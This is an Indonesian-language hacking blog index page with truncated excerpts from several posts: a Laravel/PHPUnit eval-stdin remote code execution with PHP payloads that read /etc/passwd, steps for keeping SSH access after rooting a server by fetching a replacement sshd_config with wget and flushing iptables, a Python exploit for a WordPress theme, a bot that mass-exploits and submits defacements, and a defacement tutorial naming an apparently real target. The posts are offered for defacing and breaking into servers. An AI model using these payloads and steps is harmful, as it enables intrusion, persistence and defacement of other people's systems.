Langsung ke konten utama

Postingan

Laravel PHPUnit Remote Code Execution

Laravel PHPUnit Remote Code Execution. Sebenarnya ini bug sudah lama banget. Tapi jujur saja saya juga gak tau karena memang sudah jarang banget update masalah exploit. Nah karena exploit ini kembali rame, akhirnya saya coba share aja deh di blog barangkali ada yang belum tau. Celah ini sebenarnya terletak pada vendor third party yakni PHPUnit, bukan dari Laravelnya. Vuln: eval-stdin.php Full Path Exploit : http://target /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php Affected versions : Before  4.8.28  and 5.x before  5.6.3 Disini kalian bebas untuk mengirim datanya menggunakan Burp Suite, Postman, atau curl pun bisa. Disini saya share yang pake curl dulu karena menurut saya ini yang paling simple. Gunakan parameter  -d  atau  –data  untuk mengirim payloadnya. Payload yang bisa digunakan: <?php system( 'tail /etc/passwd' ); ?> <?php echo php_uname(); ?> <?php show_source( '/etc/passwd' ); ?> Contoh command cu...

Mendapatkan Akses SSH Setelah Rooting Server

Haloo.. kali ini saya mau berbagi sedikit tips saja barangkali ada yang belum tau. Biasanya yang pernah rooting server dengan localroot dirtyc0w sering pas sudah eskalasi, add user dan ganti password ternyata tidak bisa masuk ke ssh karena port ssh yang diganti, atau password auth dimatikan (sysadmin server tersebut login menggunakan auth key). Ada juga kasus dimana proses privilege escalation langsung memanggil tty dengan id root, namun ketika menambahkan user tidak bisa karena akses ke perintah seperti passwd iptables, dll dibatasi. Oke kita bahas dulu kasus pertama. dirty cow exploit – eksekusi localroot – ganti user dan password –  tidak bisa masuk ke ssh . Kemungkinan nya ada dua, tidak diijinkan login dengan password , atau memang ssh hanya bisa diakses melalui ip tertentu saja (pengaturan iptables). Trik nya : su firefat cd /etc/ssh/ rm sshd_config wget https://raw.githubusercontent.com/linuxsec/pentest/master/sshd.txt -O sshd_config iptables -F service ssh...

Wordpress Premium Themes Shopsum Unauthenticated Configuration

# Exploit  Title : Wordpress Premium Themes Shopsum Unauthenticated Configuration Access Vulnerability # Author  : Mr.Buckethead # Date  : November 13th, 2014 # Category  : Web Applications # Vulnerability  : Unauthenticated Configuration Access # Tested  On : Windows 7 32-bit, Backbox # Dork  : inurl:/wp-content/themes/shopsum/hades_framework/ or use ur imagination #Exploit : http://localhost/path/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php # POC  : Save File As Python (.py) = import httplib, urllib # target  site site = "victim" #<--- no http:// or https:// # path  to ajax.php url = "t/wp-content/themes/shopsum/hades_framework/option_panel/ajax.php" def ChangeOption(site, url, option_name, option_value): params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept...

Bot Bing Dorker + Auto Exploit + Zone-H Submit Exploit elFinder Hosting Nazuka

Haloo guys. Kali ini ane mau share bot bing dorker + auto exploit + zone-h submit untuk exploit elfinder di hostig nazuka. Jadi tinggal masukkan dork bing nya, tinggal coli, dan biarkan bot yang bekerja. Biar rata sekalian hahaha 😀 . Pertama tau exploit ini sebenernya 4 hari yang lalu, di grup chat Jancok Security. Yup, hosting gratis nazuka ternyata menyimpan “backdoor” yang cukup fatal di lokasi  /_file-manager/php/connector.php  . Bakal dapet banyak kalo niat deface. Tapi pas baca, saya gak tertarik samasekali . Maklum, saya sudah gak minat sama deface deface. Cuman tadi mau nyari berita di zone-h kok banyak arsip hosting nazuka, jadi kepikiran buat bot nya. Untuk script nya bisa download disini : Bot Auto Tusbol Nazuka Sebelumnya thanks banget buat  Mr.MaGnoM , atas referensi bing dorker nya. Big respect bro 🙂 Oh iya, disini ada beberapa parameter yang harus diubah. $zh = “zafk1el”;  Itu nick zone-h. Silahkan diganti sendiri ya. Lalu bagi...

Tutorial Deface RCE (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability

Hallo Pada kesempatan kali ini saya akan memberikan tutorial RCE  Remote Code Exeecution. Baiklah Langsung Saja (Remote Code Execution) Technote CGI Exploit 0.4 Remote Shell Upload Vulnerability Pertama Kita Dorking Dulu Webnya : Google Dork 1 :  inurl:/cgi-bin/technote/ inurl:".cgi?board=FREE_BOARD" intext:"TECHNOTE-TOP" kembangkan lagi bang biar banyak yang perawan disini saya sudah mempunyai target :) http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD &number=20&view=2&howmanytext=  kita ambil linknya sampe FREE_BOARD SAJA  http://naju-bae.com/cgi_bin/main.cgi?board=FREE_BOARD Langkah Selajutnya Kita Download Dulu Tools/Exploit nya :) https://pastebin.com/raw/jb4Zf0kn  Ubah Ekstensi Menjadi pl karena ini codingan perl gimana sih cara jalanin toolsnya ? anda bisa menggunakan xampp   karena disini saya menggunakan OS Berbasis Ubuntu Jadi tidak Perlu Install Install Lagi h3h3 Langkah Selanjutnya  Buka Terminalnya  ...